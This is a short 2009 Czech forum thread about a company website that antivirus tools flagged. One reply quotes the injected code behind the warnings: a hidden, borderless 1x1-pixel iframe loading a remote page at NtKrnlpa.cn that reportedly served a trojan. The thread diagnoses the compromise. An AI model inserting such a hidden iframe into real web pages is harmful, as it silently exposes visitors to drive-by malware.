Stránka 1 z 1
Malware na stránce-NOD nic
Napsal: pát 22. kvě 2009, 23:53
od arxeiss
Hojte. Stryk pracuje ve firmě, a jejich stránka je
http://www.betochem.cz. Když jsem na tu stránku najel na svojem kompu, kde mám NOD 32, tak mi to neudělalo nic, a na stránku jsem se dostal, až Chrome mi vyhodil chybu. Na mamčiném kde je Avast, vyhodil chybu on, a dál mě nepustil. Mohli by jste mi něco o tom říct co se tam dějě? Zjistil jsem že je tam iframe na nějakou cizí stránku, ale když jsem si jí dal do adresy tak ji to nenašlo.
Díky za každou poznámku
Re: Malware na stránce-NOD nic
Napsal: sob 23. kvě 2009, 03:06
od xxsawer
Hezký
Řek bych, že v kámošově firmě jim někdo vyhackoval webovky a hezky nenápadně
Ten iframe o kterym mluvíš je tohle:
Kód: Vybrat vše
<iframe src="http://NtKrnlpa.cn/rc/" style="border: 0pt none ;" height="1" width="1"></iframe>
Neni divu, že ho nevidíš protože má nastavenej nulovej rámeček a rozměry 1x1 pixel a načítá (nebo spíš načítala) se do něj nějaká čínská stránka pravděpodobně s nějakym trojanem, která je už teď odstavená...Jinak ten iframe se načítá úplně dolů do toho šedýho pruhu.
Stačí si dát na googlu vyhledat "NtKrnlpa" a odkazy se jenom hrnou - většinou to sou právě logy z hijackthis...
Jestli tě avast ani chrome dál nepustí tak je to tim, že už mají v databázi tenhle server jako útočnej nebo něco podobnýho.
NOD byl vždycky shit, ale třeba nemáš jenom updatovanou databázi
Re: Malware na stránce-NOD nic
Napsal: sob 23. kvě 2009, 12:12
od arxeiss
No vím, na ten iframe jsem se díval, a dával jsem si tu stránku do googlu, a hrnuly se odkazy, ale ta stránka už neexistuje. A proč si myslíš že NOD je šit?
Re: Malware na stránce-NOD nic
Napsal: sob 23. kvě 2009, 17:49
od xxsawer
No vzdyt jsem psal, ze uz je stranka odstavena...
S NODem mam jenom spatny zkusenosti, takze sem ho poslal do kytek